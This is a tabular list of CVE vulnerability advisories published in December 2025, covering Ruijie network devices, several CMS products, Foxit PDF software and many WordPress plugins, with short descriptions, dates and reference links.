| n/a--Ruijie X60 PRO X60_10212014RG-X60 PRO V1.00/V2.00 | OS Command Injection vulnerability in Ruijie X60 PRO X60_10212014RG-X60 PRO V1.00/V2.00 allowing attackers to execute arbitrary commands via a crafted POST request to the module_set in file /usr/local/lua/dev_sta/nbr_cwmp.lua. | 2025-12-11 | not yet calculated | CVE-2025-56118 | https://1drv.ms/t/c/12406a392c92914b/EV2jr71QaoFBjf3SLQcUA6sBcmzSsyx2jJ_XY7yOBk_Sjg?e=WOY7Wd https://1drv.ms/f/c/12406a392c92914b/EqOEJce7qVtBlzpFonUkSfYBz09eegk6KowUdpDNexgUvw?e=qfwDKh https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56118.md |
| n/a--Ruijie X60 PRO X60_10212014RG-X60 PRO V1.00/V2.00 | OS Command Injection vulnerability in Ruijie X60 PRO X60_10212014RG-X60 PRO V1.00/V2.00 allowing attackers to execute arbitrary commands via a crafted POST request to the module_set in file /usr/local/lua/dev_config/config_retain.lua. | 2025-12-11 | not yet calculated | CVE-2025-56120 | https://1drv.ms/f/c/12406a392c92914b/EqOEJce7qVtBlzpFonUkSfYBz09eegk6KowUdpDNexgUvw?e=qfwDKh https://1drv.ms/t/c/12406a392c92914b/EZf6v9BXDpFAs09oCidKJ8oBXclUWtjyMcQv3DgMfISkJg?e=MyjOdI https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56120.md |
| n/a--Ruijie RG-EW1800GX PRO B11P226_EW1800GX-PRO_10223117 | OS Command Injection vulnerability in Ruijie RG-EW1800GX PRO B11P226_EW1800GX-PRO_10223117 allowing attackers to execute arbitrary commands via a crafted POST request to the module_get in file /usr/local/lua/dev_sta/networkConnect.lua. | 2025-12-11 | not yet calculated | CVE-2025-56122 | https://1drv.ms/f/c/12406a392c92914b/Eohr-0awt6VAuiLCNhCG0rgBLQip6nJpl-9Hy0OqB4MvFg?e=DIfBxi https://1drv.ms/t/c/12406a392c92914b/EZOBtzLwlmBKschv6sxT_LcBBKnMP_OXO7d24321UD8x8g?e=Dpui5j https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56122.md |
| n/a--Ruijie RG-EW1200G PRO RG-EW1200G PRO V1.00/V2.00/V3.00/V4.00 | OS Command Injection vulnerability in Ruijie RG-EW1200G PRO RG-EW1200G PRO V1.00/V2.00/V3.00/V4.00 allowing attackers to execute arbitrary commands via a crafted POST request to the module_get in file /usr/local/lua/dev_sta/networkConnect.lua. | 2025-12-11 | not yet calculated | CVE-2025-56123 | https://1drv.ms/f/c/12406a392c92914b/EkH0xWseMXBJg-Ck_uD34fcB-3pDo3MAQc2AKNlXqwYr2w?e=GU9l62 https://1drv.ms/t/c/12406a392c92914b/ERjNMNZRBD5HoYydt7Kb3kwBT4ycJXROxTsVBB-WXXqH6Q?e=q8Lcd2 https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56123.md |
| n/a--Ruijie X60 PRO X60_10212014RG-X60 PRO V1.00/V2.00 | OS Command Injection vulnerability in Ruijie X60 PRO X60_10212014RG-X60 PRO V1.00/V2.00 allowing attackers to execute arbitrary commands via a crafted POST request to the module_get in file /usr/local/lua/dev_sta/networkConnect.lua. | 2025-12-11 | not yet calculated | CVE-2025-56124 | https://1drv.ms/f/c/12406a392c92914b/EqOEJce7qVtBlzpFonUkSfYBz09eegk6KowUdpDNexgUvw?e=qfwDKh https://1drv.ms/t/c/12406a392c92914b/EWnUygFXeTVNigjp81gJ3LQBJ-hCSb_Yq4gGIMxlan7uJg?e=emOIoc https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56124.md |
| n/a--Ruijie RG-BCR RG-BCR600W | OS Command Injection vulnerability in Ruijie RG-BCR RG-BCR600W allowing attackers to execute arbitrary commands via a crafted POST request to the get_wanobj in file /usr/lib/lua/luci/controller/admin/common.lua. | 2025-12-11 | not yet calculated | CVE-2025-56127 | https://1drv.ms/f/c/12406a392c92914b/Evvem8Mw6SlNh-ZJpY_9SAsBq2iDi88TFdFdA1Am3PdfCQ?e=YeLYxb https://1drv.ms/t/c/12406a392c92914b/EQkKqI8NW45AgBgScwGNiPABEK0YLvNQFgNtqLaWAhCPVw?e=cLDW5t https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56127.md |
| n/a--Ruijie RG-BCR RG-BCR860 | OS Command Injection vulnerability in Ruijie RG-BCR RG-BCR860 allowing attackers to execute arbitrary commands via a crafted POST request to the action_diagnosis in file /usr/lib/lua/luci/controller/admin/diagnosis.lua. | 2025-12-11 | not yet calculated | CVE-2025-56129 | https://1drv.ms/f/c/12406a392c92914b/EqEQemupso9DldgG-EcUI8IBLpEWP_S-f6vpeUtYztYYCg?e=gX4A10 https://1drv.ms/t/c/12406a392c92914b/EaJ2e_mzgltOiHqb4t8xIvgBoT2CYEP0nrhZd7IYlCHSPQ?e=miUrrL https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56129.md |
| n/a--Ruijie RG-S1930 S1930SWITCH_3.0(1)B11P230 | OS Command Injection vulnerability in Ruijie RG-S1930 S1930SWITCH_3.0(1)B11P230 allowing attackers to execute arbitrary commands via a crafted POST request to the module_update in file /usr/local/lua/dev_config/ace_sw.lua. | 2025-12-11 | not yet calculated | CVE-2025-56130 | https://1drv.ms/f/c/12406a392c92914b/EpWU9cQdd5RNszcYlTj2cGsBfiClkCwF0zCsLNYer2VIZA?e=ANIgPM https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56130.md |
| n/a--Fearless Geek Media FearlessCMS v.0.0.2-15 | Cross Site Scripting vulnerability in Fearless Geek Media FearlessCMS v.0.0.2-15 allows a remote attacker to obtain sensitive information via the login.php component. | 2025-12-10 | not yet calculated | CVE-2025-56429 | https://github.com/fearlessgeekmedia/FearlessCMS/issues/36 |
| n/a--Fearless Geek Media FearlessCMS v.0.0.2-15 | Directory Traversal vulnerability in Fearless Geek Media FearlessCMS v.0.0.2-15 allows a remote attacker to cause a denial of service via the plugin-handler.php and the deleteDirectory function. | 2025-12-10 | not yet calculated | CVE-2025-56430 | https://github.com/fearlessgeekmedia/FearlessCMS/issues/36 |
| n/a--Fearless Geek Media FearlessCMS v.0.0.2-15 | Directory Traversal vulnerability in Fearless Geek Media FearlessCMS v.0.0.2-15 allows a remote attacker to cause a denial of service via the plugin-handler.php and the file_get_contents() function. | 2025-12-10 | not yet calculated | CVE-2025-56431 | https://github.com/fearlessgeekmedia/FearlessCMS/issues/36 |
| n/a--LeptonCMS version 7.3.0 | LeptonCMS version 7.3.0 contains an arbitrary file upload vulnerability, which is caused by the lack of proper validation for uploaded files. An authenticated attacker can exploit this vulnerability by uploading a specially crafted ZIP/PHP file to execute arbitrary code. | 2025-12-09 | not yet calculated | CVE-2025-56704 | http://lepton.com https://github.com/Kayi626/Vulns/blob/UserAccount/LEPTON_CMS_7.3.0_File_Upload_A.pdf https://github.com/Kayi626/Vulns/blob/UserAccount/LEPTON_CMS_7.3.0_File_Upload_B.pdf https://github.com/Kayi626/Vulns/blob/UserAccount/LEPTON_CMS_7.3.0_File_Upload_C.pdf |
| Japan Total System Co.,Ltd.--GroupSession Free edition | Reflected cross-site scripting vulnerability exists in GroupSession Free edition prior to ver5.3.0, GroupSession byCloud prior to ver5.3.3, and GroupSession ZION prior to ver5.3.2. If a user accesses a crafted page or URL, an arbitrary script may be executed on the web browser of the user. | 2025-12-12 | not yet calculated | CVE-2025-57883 | https://groupsession.jp/info/info-news/security20251208 https://jvn.jp/en/jp/JVN19940619/ |
| Apache Software Foundation--Apache Fineract | Insufficiently Protected Credentials vulnerability in Apache Fineract. This issue affects Apache Fineract: through 1.11.0. The issue is fixed in version 1.12.1. Users are encouraged to upgrade to version 1.13.0, the latest release. | 2025-12-12 | not yet calculated | CVE-2025-58130 | https://lists.apache.org/thread/d9zpkc86zk265523tfvbr8w7gyr6onoy |
| Apache Software Foundation--Apache Fineract | Authorization Bypass Through User-Controlled Key vulnerability in Apache Fineract. This issue affects Apache Fineract: through 1.11.0. The issue is fixed in version 1.12.1. Users are encouraged to upgrade to version 1.13.0, the latest release. | 2025-12-12 | not yet calculated | CVE-2025-58137 | https://lists.apache.org/thread/gz3zhoghlclch3rdnzyrdcf69c0507ww |
| Japan Total System Co.,Ltd.--GroupSession Free edition | Cross-site request forgery vulnerability exists in GroupSession Free edition prior to ver5.3.0, GroupSession byCloud prior to ver5.3.3, and GroupSession ZION prior to ver5.3.2. If a user accesses a malicious page while logged in, unintended operations may be performed. | 2025-12-12 | not yet calculated | CVE-2025-58576 | https://groupsession.jp/info/info-news/security20251208 https://jvn.jp/en/jp/JVN19940619/ |
| AMI--AptioV | APTIOV contains a vulnerability in BIOS where a user may cause "Improper Handling of Insufficient Permissions or Privileges" by local access. Successful exploitation of this vulnerability can lead to escalation of authorization and potentially impact Integrity and Availability. | 2025-12-12 | not yet calculated | CVE-2025-58770 | https://go.ami.com/hubfs/Security%20Advisories/2025/AMI-SA-2025009.pdf |
| Badi Jones--Duplicate Content Cure | Cross-Site Request Forgery (CSRF) vulnerability in Badi Jones Duplicate Content Cure duplicate-content-cure allows Cross Site Request Forgery. This issue affects Duplicate Content Cure: from n/a through <= 1.0. | 2025-12-09 | not yet calculated | CVE-2025-59132 | https://vdp.patchstack.com/database/Wordpress/Plugin/duplicate-content-cure/vulnerability/wordpress-duplicate-content-cure-plugin-1-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| n/a--libcoap's OSCORE | A memory disclosure vulnerability exists in libcoap's OSCORE configuration parser in libcoap before release-4.3.5-patches. An out-of-bounds read may occur when parsing certain configuration values, allowing an attacker to infer or read memory beyond string boundaries in the .rodata section. This could potentially lead to information disclosure or denial of service. | 2025-12-08 | not yet calculated | CVE-2025-59391 | https://github.com/obgm/libcoap/releases/tag/v4.3.5a https://github.com/obgm/libcoap/pull/1730 |
| n/a--Foxit PDF Editor and Reader before 2025.2.1 | Foxit PDF Editor and Reader before 2025.2.1 allow signature spoofing via OCG. When Optional Content Groups (OCG) are supported, the state property of an OCG is runtime-only and not included in the digital signature computation buffer. An attacker can leverage JavaScript or PDF triggers to dynamically change the visibility of OCG content after signing (Post-Sign), allowing the visual content of a signed PDF to be modified without invalidating the signature. This may result in a mismatch between the signed content and what the signer or verifier sees, undermining the trustworthiness of the digital signature. The fixed versions are 2025.2.1, 14.0.1, and 13.2.1. | 2025-12-11 | not yet calculated | CVE-2025-59802 | https://www.foxit.com/support/security-bulletins.html |
| n/a--Foxit PDF Editor and Reader before 2025.2.1 | Foxit PDF Editor and Reader before 2025.2.1 allow signature spoofing via triggers. An attacker can embed triggers (e.g., JavaScript) in a PDF document that execute during the signing process. When a signer reviews the document, the content appears normal. However, once the signature is applied, the triggers modify content on other pages or optional content layers without explicit warning. This can cause the signed PDF to differ from what the signer saw, undermining the trustworthiness of the digital signature. The fixed versions are 2025.2.1, 14.0.1, and 13.2.1. | 2025-12-11 | not yet calculated | CVE-2025-59803 | https://www.foxit.com/support/security-bulletins.html |
| n/a--phpIPAM v1.7.3 | phpIPAM v1.7.3 contains a Cross-Site Request Forgery (CSRF) vulnerability in the database export functionality. The generate-mysql.php function, located in the /app/admin/import-export/ endpoint, allows remote attackers to trigger large database dump downloads via crafted HTTP GET requests if an administrator has an active session. | 2025-12-08 | not yet calculated | CVE-2025-60912 | https://github.com/phpipam/phpipam https://gist.github.com/amandrei/a8377d9b71c55156d22aaaf485463d15 |
| n/a--GmbH Mitarbeiterportal 2.15.2.0 | A stored Cross Site Scripting (XSS) vulnerability in the bulletin board (SchwarzeBrett) in adata Software GmbH Mitarbeiter Portal 2.15.2.0 allows remote authenticated users to execute arbitrary JavaScript code in the web browser of other users via manipulation of the 'Inhalt' parameter of the '/SchwarzeBrett/Nachrichten/CreateNachricht' or '/SchwarzeBrett/Nachrichten/EditNachricht/' requests. | 2025-12-09 | not yet calculated | CVE-2025-61074 | https://www.adata.de/mitarbeiter-portal/ https://no-sec.net/posts/cve-2025-61074/ |
| n/a--GmbH Mitarbeiterportal 2.15.2.0 | Multiple Incorrect Access Control vulnerabilities in adata Software GmbH Mitarbeiterportal 2.15.2.0 allow remote authenticated, low-privileged users to carry out administrative functions and manipulate data of other users via unauthorized API calls. | 2025-12-09 | not yet calculated | CVE-2025-61075 | https://www.adata.de/mitarbeiter-portal/ https://no-sec.net/posts/cve-2025-61075/ |
| n/a--phpIPAM v1.7.3 | Cross-site scripting (XSS) vulnerability in Request IP form in phpIPAM v1.7.3 allows remote attackers to inject arbitrary web script or HTML via the instructions parameter for the /app/admin/instructions/edit-result.php endpoint. | 2025-12-09 | not yet calculated | CVE-2025-61078 | http://phpipam.com https://glitch0ne.com/2025/12/05/cve-2025-61078-cross-site-scripting-xss-vulnerability-in-request-ip-form-in-phpipam-v1-7-3/ |
| n/a--Outsystems Platform Server 11.18.1.37828 | An issue was discovered in Outsystems Platform Server 11.18.1.37828 that allows attackers to cause a denial of service via a crafted Content-Length value that does not match the body length. | 2025-12-09 | not yet calculated | CVE-2025-61258 | https://www.outsystems.com/ https://balwurk.com/ https://balwurk.github.io/CVE-2025-61258/ |
| n/a--Emlog Pro 2.5.20 | Emlog Pro 2.5.20 has an arbitrary file deletion vulnerability. This vulnerability stems from the admin/template.php component and the admin/plugin.php component. They fail to perform path verification and dangerous code filtering for deletion parameters, allowing attackers to exploit this feature for directory traversal. | 2025-12-08 | not yet calculated | CVE-2025-61318 | https://github.com/AndyNull/em/blob/main/emlog%20pro%20-%20del%20vuln.md |
| Japan Total System Co.,Ltd.--GroupSession Free edition | In GroupSession, a Circular notice can be created with its memo field non-editable, but the authorization check is improperly implemented. With a crafted request, a logged-in user may alter the memo field. The affected products and versions are GroupSession Free edition prior to ver5.3.0, GroupSession byCloud prior to ver5.3.3, and GroupSession ZION prior to ver5.3.2. | 2025-12-12 | not yet calculated | CVE-2025-61950 | https://groupsession.jp/info/info-news/security20251208 https://jvn.jp/en/jp/JVN19940619/ |
| Japan Total System Co.,Ltd.--GroupSession Free edition | GroupSession Free edition prior to ver5.3.0, GroupSession byCloud prior to ver5.3.3, and GroupSession ZION prior to ver5.3.2 do not validate origins in WebSockets. If a user accesses a crafted page, Chat information sent to the user may be exposed. | 2025-12-12 | not yet calculated | CVE-2025-61987 | https://groupsession.jp/info/info-news/security20251208 https://jvn.jp/en/jp/JVN19940619/ |
| Nasir Uddin--Generic Elements | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Nasir Uddin Generic Elements generic-elements-for-elementor allows Stored XSS. This issue affects Generic Elements: from n/a through <= 1.2.8. | 2025-12-09 | not yet calculated | CVE-2025-62082 | https://vdp.patchstack.com/database/Wordpress/Plugin/generic-elements-for-elementor/vulnerability/wordpress-generic-elements-plugin-1-2-8-cross-site-scripting-xss-vulnerability?_s_id=cve |
| berthaai--BERTHA AI | Missing Authorization vulnerability in berthaai BERTHA AI bertha-ai-free allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects BERTHA AI: from n/a through <= 1.13. | 2025-12-09 | not yet calculated | CVE-2025-62085 | https://vdp.patchstack.com/database/Wordpress/Plugin/bertha-ai-free/vulnerability/wordpress-bertha-ai-plugin-1-13-broken-access-control-vulnerability?_s_id=cve |
| akazanstev--Яндекс Доставка (Boxberry) | Missing Authorization vulnerability in akazanstev Яндекс Доставка (Boxberry) boxberry allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Яндекс Доставка (Boxberry): from n/a through <= 2.32. | 2025-12-09 | not yet calculated | CVE-2025-62086 | https://vdp.patchstack.com/database/Wordpress/Plugin/boxberry/vulnerability/wordpress-yandeks-dostavka-boxberry-plugin-2-32-broken-access-control-vulnerability?_s_id=cve |
| Jegstudio--Gutenverse News Advanced News Magazine Blog Gutenberg Blocks Addons | Missing Authorization vulnerability in Jegstudio Gutenverse News - Advanced News Magazine Blog Gutenberg Blocks Addons gutenverse-news allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Gutenverse News - Advanced News Magazine Blog Gutenberg Blocks Addons: from n/a through <= 3.0.2. | 2025-12-09 | not yet calculated | CVE-2025-62090 | https://vdp.patchstack.com/database/Wordpress/Plugin/gutenverse-news/vulnerability/wordpress-gutenverse-news-advanced-news-magazine-blog-gutenberg-blocks-addons-plugin-3-0-2-broken-access-control-vulnerability?_s_id=cve |
| LambertGroup--Image&Video FullScreen Background | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in LambertGroup Image&Video FullScreen Background lbg_fullscreen_fullwidth_slider allows SQL Injection. This issue affects Image&Video FullScreen Background: from n/a through <= 1.6.7. | 2025-12-09 | not yet calculated | CVE-2025-62093 | https://vdp.patchstack.com/database/Wordpress/Plugin/lbg_fullscreen_fullwidth_slider/vulnerability/wordpress-image-video-fullscreen-background-plugin-1-6-7-sql-injection-vulnerability?_s_id=cve |
| themerain--ThemeRain Core | Missing Authorization vulnerability in themerain ThemeRain Core themerain-core allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects ThemeRain Core: from n/a through <= 1.1.9. | 2025-12-09 | not yet calculated | CVE-2025-62100 | https://vdp.patchstack.com/database/Wordpress/Plugin/themerain-core/vulnerability/wordpress-themerain-core-plugin-1-1-9-broken-access-control-vulnerability?_s_id=cve |
| apasionados--DoFollow Case by Case | Cross-Site Request Forgery (CSRF) vulnerability in apasionados DoFollow Case by Case dofollow-case-by-case allows Cross Site Request Forgery. This issue affects DoFollow Case by Case: from n/a through <= 3.5.1. | 2025-12-09 | not yet calculated | CVE-2025-62102 | https://vdp.patchstack.com/database/Wordpress/Plugin/dofollow-case-by-case/vulnerability/wordpress-dofollow-case-by-case-plugin-3-5-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| wpmediadownload--Media Library File Download | Cross-Site Request Forgery (CSRF) vulnerability in wpmediadownload Media Library File Download media-download allows Cross Site Request Forgery. This issue affects Media Library File Download: from n/a through <= 1.4. | 2025-12-09 | not yet calculated | CVE-2025-62103 | https://vdp.patchstack.com/database/Wordpress/Plugin/media-download/vulnerability/wordpress-media-library-file-download-plugin-1-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| INFINITUM FORM--Geo Controller | Insertion of Sensitive Information Into Sent Data vulnerability in INFINITUM FORM Geo Controller cf-geoplugin allows Retrieve Embedded Sensitive Data. This issue affects Geo Controller: from n/a through <= 8.9.4. | 2025-12-09 | not yet calculated | CVE-2025-62109 | https://vdp.patchstack.com/database/Wordpress/Plugin/cf-geoplugin/vulnerability/wordpress-geo-controller-plugin-8-9-4-sensitive-data-exposure-vulnerability?_s_id=cve |
| Virtuaria--Virtuaria PagBank / PagSeguro para Woocommerce | Missing Authorization vulnerability in Virtuaria Virtuaria PagBank / PagSeguro para Woocommerce virtuaria-pagseguro allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Virtuaria PagBank / PagSeguro para Woocommerce: from n/a through <= 3.6.3. | 2025-12-09 | not yet calculated | CVE-2025-62151 | https://vdp.patchstack.com/database/Wordpress/Plugin/virtuaria-pagseguro/vulnerability/wordpress-virtuaria-pagbank-pagseguro-para-woocommerce-plugin-3-6-3-broken-access-control-vulnerability?_s_id=cve |
| ConveyThis--ConveyThis | Missing Authorization vulnerability in ConveyThis ConveyThis conveythis-translate allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects ConveyThis: from n/a through <= 268.10. | 2025-12-09 | not yet calculated | CVE-2025-62152 | https://vdp.patchstack.com/database/Wordpress/Plugin/conveythis-translate/vulnerability/wordpress-conveythis-plugin-268-10-broken-access-control-vulnerability?_s_id=cve |
| Graham--Quick Interest Slider | Missing Authorization vulnerability in Graham Quick Interest Slider quick-interest-slider allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Quick Interest Slider: from n/a through <= 3.1.5. | 2025-12-09 | not yet calculated | CVE-2025-62153 | https://vdp.patchstack.com/database/Wordpress/Plugin/quick-interest-slider/vulnerability/wordpress-quick-interest-slider-plugin-3-1-5-broken-access-control-vulnerability?_s_id=cve |
| Japan Total System Co.,Ltd.--GroupSession Free edition | SQL Injection vulnerability exists in GroupSession Free edition prior to ver5.3.0, GroupSession byCloud prior to ver5.3.3, and GroupSession ZION prior to ver5.3.2. If exploited, information stored in the database may be obtained or altered by an authenticated user. | 2025-12-12 | not yet calculated | CVE-2025-62192 | https://groupsession.jp/info/info-news/security20251208 https://jvn.jp/en/jp/JVN19940619/ |
| ProteusThemes--Custom Sidebars by ProteusThemes | Cross-Site Request Forgery (CSRF) vulnerability in ProteusThemes Custom Sidebars by ProteusThemes custom-sidebars-by-proteusthemes allows Cross Site Request Forgery. This issue affects Custom Sidebars by ProteusThemes: from n/a through <= 1.0.3. | 2025-12-09 | not yet calculated | CVE-2025-62733 | https://vdp.patchstack.com/database/Wordpress/Plugin/custom-sidebars-by-proteusthemes/vulnerability/wordpress-custom-sidebars-by-proteusthemes-plugin-1-0-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Michael Revellin-Clerc--Media Library Downloader | Cross-Site Request Forgery (CSRF) vulnerability in Michael Revellin-Clerc Media Library Downloader media-library-downloader allows Cross Site Request Forgery. This issue affects Media Library Downloader: from n/a through <= 1.4.0. | 2025-12-09 | not yet calculated | CVE-2025-62734 | https://vdp.patchstack.com/database/Wordpress/Plugin/media-library-downloader/vulnerability/wordpress-media-library-downloader-plugin-1-4-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Joel--User Spam Remover | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Joel User Spam Remover user-spam-remover allows Retrieve Embedded Sensitive Data. This issue affects User Spam Remover: from n/a through <= 1.1. | 2025-12-09 | not yet calculated | CVE-2025-62735 | https://vdp.patchstack.com/database/Wordpress/Plugin/user-spam-remover/vulnerability/wordpress-user-spam-remover-plugin-1-1-sensitive-data-exposure-vulnerability?_s_id=cve |
| opicron--Image Cleanup | Missing Authorization vulnerability in opicron Image Cleanup image-cleanup allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Image Cleanup: from n/a through <= 1.9.2. | 2025-12-09 | not yet calculated | CVE-2025-62736 | https://vdp.patchstack.com/database/Wordpress/Plugin/image-cleanup/vulnerability/wordpress-image-cleanup-plugin-1-9-2-broken-access-control-vulnerability?_s_id=cve |
| opicron--Image Cleanup | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in opicron Image Cleanup image-cleanup allows Retrieve Embedded Sensitive Data. This issue affects Image Cleanup: from n/a through <= 1.9.2. | 2025-12-09 | not yet calculated | CVE-2025-62737 | https://vdp.patchstack.com/database/Wordpress/Plugin/image-cleanup/vulnerability/wordpress-image-cleanup-plugin-1-9-2-sensitive-data-exposure-vulnerability?_s_id=cve |
| mmattax--Formstack Online Forms | Missing Authorization vulnerability in mmattax Formstack Online Forms formstack allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Formstack Online Forms: from n/a through <= 2.0.2. | 2025-12-09 | not yet calculated | CVE-2025-62738 | https://vdp.patchstack.com/database/Wordpress/Plugin/formstack/vulnerability/wordpress-formstack-online-forms-plugin-2-0-2-broken-access-control-vulnerability?_s_id=cve |
| SaifuMak--Add Custom Codes | Cross-Site Request Forgery (CSRF) vulnerability in SaifuMak Add Custom Codes add-custom-codes allows Cross Site Request Forgery. This issue affects Add Custom Codes: from n/a through <= 4.80. | 2025-12-09 | not yet calculated | CVE-2025-62739 | https://vdp.patchstack.com/database/Wordpress/Plugin/add-custom-codes/vulnerability/wordpress-add-custom-codes-plugin-4-80-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Mario Peshev--WP-CRM System | Missing Authorization vulnerability in Mario Peshev WP-CRM System wp-crm-system allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP-CRM System: from n/a through <= 3.4.5. | 2025-12-09 | not yet calculated | CVE-2025-62740 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-crm-system/vulnerability/wordpress-wp-crm-system-plugin-3-4-5-broken-access-control-vulnerability?_s_id=cve |
| photoboxone--SMTP Mail | Cross-Site Request Forgery (CSRF) vulnerability in photoboxone SMTP Mail smtp-mail allows Cross Site Request Forgery. This issue affects SMTP Mail: from n/a through <= 1.3.47. | 2025-12-09 | not yet calculated | CVE-2025-62762 | https://vdp.patchstack.com/database/Wordpress/Plugin/smtp-mail/vulnerability/wordpress-smtp-mail-plugin-1-3-47-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Evan Herman--Post Cloner | Missing Authorization vulnerability in Evan Herman Post Cloner post-cloner allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Post Cloner: from n/a through <= 1.0.0. | 2025-12-09 | not yet calculated | CVE-2025-62865 | https://vdp.patchstack.com/database/Wordpress/Plugin/post-cloner/vulnerability/wordpress-post-cloner-plugin-1-0-0-broken-access-control-vulnerability?_s_id=cve |
| Valerio Monti--Auto Alt Text | Cross-Site Request Forgery (CSRF) vulnerability in Valerio Monti Auto Alt Text auto-alt-text allows Cross Site Request Forgery. This issue affects Auto Alt Text: from n/a through <= 2.5.2. | 2025-12-09 | not yet calculated | CVE-2025-62866 | https://vdp.patchstack.com/database/Wordpress/Plugin/auto-alt-text/vulnerability/wordpress-auto-alt-text-plugin-2-5-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| ergonet--Ergonet Cache | Missing Authorization vulnerability in ergonet Ergonet Cache ergonet-varnish-cache allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Ergonet Cache: from n/a through <= 1.0.11. | 2025-12-09 | not yet calculated | CVE-2025-62867 | https://vdp.patchstack.com/database/Wordpress/Plugin/ergonet-varnish-cache/vulnerability/wordpress-ergonet-cache-plugin-1-0-11-broken-access-control-vulnerability?_s_id=cve |
| Gravitec.net - Web Push Notifications--Gravitec.net – Web Push Notifications | Missing Authorization vulnerability in Gravitec.net - Web Push Notifications Gravitec.net – Web Push Notifications gravitec-net-web-push-notifications allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Gravitec.net – Web Push Notifications: from n/a through <= 2.9.17. | 2025-12-09 | not yet calculated | CVE-2025-62869 | https://vdp.patchstack.com/database/Wordpress/Plugin/gravitec-net-web-push-notifications/vulnerability/wordpress-gravitec-net-web-push-notifications-plugin-2-9-17-broken-access-control-vulnerability?_s_id=cve |
| Eupago--Eupago Gateway For Woocommerce | Missing Authorization vulnerability in Eupago Eupago Gateway For Woocommerce eupago-gateway-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Eupago Gateway For Woocommerce: from n/a through <= 4.6.3. | 2025-12-09 | not yet calculated | CVE-2025-62870 | https://vdp.patchstack.com/database/Wordpress/Plugin/eupago-gateway-for-woocommerce/vulnerability/wordpress-eupago-gateway-for-woocommerce-plugin-4-6-3-broken-access-control-vulnerability?_s_id=cve |
| Alex Prokopenko / JustCoded--Just TinyMCE Custom Styles | Cross-Site Request Forgery (CSRF) vulnerability in Alex Prokopenko / JustCoded Just TinyMCE Custom Styles just-tinymce-styles allows Cross Site Request Forgery. This issue affects Just TinyMCE Custom Styles: from n/a through <= 1.2.1. | 2025-12-09 | not yet calculated | CVE-2025-62871 | https://vdp.patchstack.com/database/Wordpress/Plugin/just-tinymce-styles/vulnerability/wordpress-just-tinymce-custom-styles-plugin-1-2-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| JK--Social Photo Fetcher | Cross-Site Request Forgery (CSRF) vulnerability in JK Social Photo Fetcher facebook-photo-fetcher allows Cross Site Request Forgery. This issue affects Social Photo Fetcher: from n/a through <= 3.0.4. | 2025-12-09 | not yet calculated | CVE-2025-62872 | https://vdp.patchstack.com/database/Wordpress/Plugin/facebook-photo-fetcher/vulnerability/wordpress-social-photo-fetcher-plugin-3-0-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Flashyapp--WP Flashy Marketing Automation | Cross-Site Request Forgery (CSRF) vulnerability in Flashyapp WP Flashy Marketing Automation wp-flashy-marketing-automation allows Cross Site Request Forgery. This issue affects WP Flashy Marketing Automation: from n/a through <= 2.0.8. | 2025-12-09 | not yet calculated | CVE-2025-62873 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-flashy-marketing-automation/vulnerability/wordpress-wp-flashy-marketing-automation-plugin-2-0-8-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| rainafarai--Notification for Telegram | Missing Authorization vulnerability in rainafarai Notification for Telegram notification-for-telegram allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Notification for Telegram: from n/a through <= 3.4.7. | 2025-12-09 | not yet calculated | CVE-2025-62993 | https://vdp.patchstack.com/database/Wordpress/Plugin/notification-for-telegram/vulnerability/wordpress-notification-for-telegram-plugin-3-4-7-broken-access-control-vulnerability?_s_id=cve |
| WP Messiah--WP AI CoPilot | Insertion of Sensitive Information Into Sent Data vulnerability in WP Messiah WP AI CoPilot ai-co-pilot-for-wp allows Retrieve Embedded Sensitive Data. This issue affects WP AI CoPilot: from n/a through <= 1.2.7. | 2025-12-09 | not yet calculated | CVE-2025-62994 | https://vdp.patchstack.com/database/Wordpress/Plugin/ai-co-pilot-for-wp/vulnerability/wordpress-wp-ai-copilot-plugin-1-2-7-sensitive-data-exposure-vulnerability-2?_s_id=cve |
